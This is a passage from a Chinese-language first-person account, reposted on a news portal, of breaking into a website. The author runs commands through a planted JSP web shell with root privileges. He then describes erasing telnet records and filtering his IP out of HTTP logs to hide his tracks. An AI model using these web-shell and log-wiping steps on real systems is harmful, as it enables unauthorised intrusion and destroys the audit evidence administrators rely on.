接下去的事情,差點(diǎn)沒讓我吐血:
我敲了一個(gè):http://target:8080/upload/cmd.jsp?cmd=id
顯示:
- uid=0(root)gid=0(xxx)groups=0(xxx),2(xxx),3(xxx),4(xxx),5(xxx),20(xxx),31(xxx)
我的這個(gè)WEB SHELL本來就是ROOT,真是服了那個(gè)管理員,也服了自己。竟然折騰了這么半天,哎!
http://target:8080/upload/cmd.jsp?cmd=ps+aux
果然是root身份運(yùn)行的(不列出來了)
剩下來的事情:
1、刪除我的telnet記錄。
2、刪除http的日志。
至于清除日志嘛,我使用的辦法是:cat xxx grep -V "IP" >>temp然后在把temp覆蓋那些被我修改過的日志文件。
我沒有更換他的頁面,因?yàn)槲冶旧硪簿筒皇鞘裁春诳屠,更不是紅客,只是個(gè)網(wǎng)絡(luò)安全愛好者而已。所以,發(fā)封郵件告訴system admin吧!
上述的相關(guān)內(nèi)容就是對(duì)黑客攻擊技術(shù) WEB網(wǎng)站入侵的過程的描述,希望會(huì)給你帶來一些幫助在此方面。
相關(guān)閱讀
調(diào)查顯示大企業(yè)中只有33%未被黑客入侵
簡(jiǎn)述主要的黑客入侵途徑及應(yīng)對(duì)方法
通過交換機(jī)防范蠕蟲病毒入侵
黑客攻擊和入侵的八大常用手段有哪些?
黑客捕捉技術(shù)之網(wǎng)絡(luò)入侵追蹤方法
SQL注入網(wǎng)站入侵實(shí)例演示
實(shí)例講述網(wǎng)絡(luò)社會(huì)工程學(xué)
黑客入侵也無間 盜走網(wǎng)吧20萬
濟(jì)寧運(yùn)河畔網(wǎng)版權(quán)與免責(zé)聲明:
①凡本網(wǎng)來源于注明來“源于:運(yùn)河畔或damoshentu.com”版權(quán)均屬運(yùn)河畔網(wǎng)所有,其他媒體可以轉(zhuǎn)載,且需注明“來源運(yùn)河畔網(wǎng)”
② 凡本網(wǎng)注明“來源:XXX(非濟(jì)寧運(yùn)河畔,濟(jì)寧信息港)”的作品,均轉(zhuǎn)載自其它媒體,轉(zhuǎn)載目的在于傳遞更多信息,并不代表本網(wǎng)贊同其觀點(diǎn)和對(duì)其真實(shí)性負(fù)責(zé)。
③ 如因作品內(nèi)容、版權(quán)和其它問題需要同本網(wǎng)聯(lián)系的,請(qǐng)?jiān)?0日內(nèi)進(jìn)行。